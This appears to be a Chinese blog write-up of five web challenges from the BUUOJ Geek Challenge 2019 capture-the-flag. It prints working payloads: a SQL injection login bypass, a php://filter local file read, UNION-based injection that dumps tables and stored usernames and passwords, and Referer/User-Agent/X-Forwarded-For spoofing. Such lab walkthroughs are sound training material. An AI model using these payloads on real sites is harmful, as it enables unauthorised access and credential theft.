[极客大挑战 2019]EasySQL

进题目发现是个登陆页面
BUUOJ 极客大挑战 2019
admin admin登陆一下
BUUOJ 极客大挑战 2019
注意URL,试试万能密码?username=admin&password=admin' or '1'='1(tip:当passwd不对时后面的or 1=1恒真导致错误密码也可登陆)
BUUOJ 极客大挑战 2019


[极客大挑战 2019]Havefun

题目主页是个可爱的小猫
BUUOJ 极客大挑战 2019
查看源码(weber必做的事哈哈)发现php代码
BUUOJ 极客大挑战 2019
根据提示传参
BUUOJ 极客大挑战 2019


[极客大挑战 2019]Secret

哇哦,这背景与文字色
BUUOJ 极客大挑战 2019
看源码,发现另一个页面
BUUOJ 极客大挑战 2019
套娃?
BUUOJ 极客大挑战 2019
再点
BUUOJ 极客大挑战 2019
因为bp一直再开,看看target,把每个response都看了一下,发现跳转了一个
BUUOJ 极客大挑战 2019
访问一下给了源码,过滤了../、tp、input、data穿透和代码执行不行了,直接伪协议读,防止输出过滤加上base64encode,payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php
BUUOJ 极客大挑战 2019
读出来的base解码得到flag
BUUOJ 极客大挑战 2019


[极客大挑战 2019]LoveSQL

和第一题界面差不多,最上面的小红字放大看看,弱密码试试依然错误
BUUOJ 极客大挑战 2019
BUUOJ 极客大挑战 2019
我就不用sqlmap了,关于sqlmap扫文件百度有很多,手工sql好了,查列为4的时候报错
BUUOJ 极客大挑战 2019
联合查询记得把账号置为不存在的(随便输),不然正常回显会把联合查询的回显挤下去,自己可以试试
BUUOJ 极客大挑战 2019
正常注入,查表名username=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23&password=admin
BUUOJ 极客大挑战 2019
查列名?username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="l0ve1ysq1"%23&password=admin
BUUOJ 极客大挑战 2019
查字段?username=1' union select 1,group_concat(id,":",username,":",password),3 from l0ve1ysq1%23&password=admin
BUUOJ 极客大挑战 2019
太乱了,看源码(快跑~)
BUUOJ 极客大挑战 2019


[极客大挑战 2019]Http

主页挺好看
BUUOJ 极客大挑战 2019
没找到有用的信息(Syclover2019招新群:671301484,逃~)看源码
BUUOJ 极客大挑战 2019
进去看看,考察的是http头信息,具体可百度看师傅们总结的http header
BUUOJ 极客大挑战 2019
bp抓包加上referer
BUUOJ 极客大挑战 2019
更改浏览器标识User-Agent
BUUOJ 极客大挑战 2019
XFF伪造IP
BUUOJ 极客大挑战 2019
get it


暂更

相关文章:

  • 2021-11-28
  • 2021-05-28
  • 2022-01-24
  • 2021-07-07
  • 2021-10-15
猜你喜欢
  • 2022-01-25
  • 2021-11-01
  • 2022-12-23
  • 2021-07-30
  • 2022-12-23
  • 2021-10-10
  • 2021-05-25
相关资源
相似解决方案